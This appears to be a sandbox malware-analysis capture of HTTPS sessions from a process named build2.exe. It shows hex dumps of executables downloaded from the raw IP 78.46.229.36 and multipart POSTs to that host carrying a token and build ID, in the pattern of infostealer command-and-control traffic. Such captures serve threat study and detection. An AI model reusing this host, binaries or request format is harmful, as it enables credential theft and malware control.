                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                      Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                      Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                      Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                      Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                      Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                      Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                      Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                      2024-03-28 16:52:05 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                      Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      32192.168.2.64978278.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:06 UTC210OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:06 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 80880
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                      Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                      Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                      Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                      2024-03-28 16:52:07 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                      Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      33192.168.2.64978378.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:09 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 1025
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:09 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------GIEBFHCAKFBGDHIDHIDBCont
                                                                                                                                                                                                                                      2024-03-28 16:52:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:10 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      34192.168.2.64978478.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:11 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------AECAKJJECAEGCBGDHDHCCont
                                                                                                                                                                                                                                      2024-03-28 16:52:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      35192.168.2.64978578.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:12 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKK
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
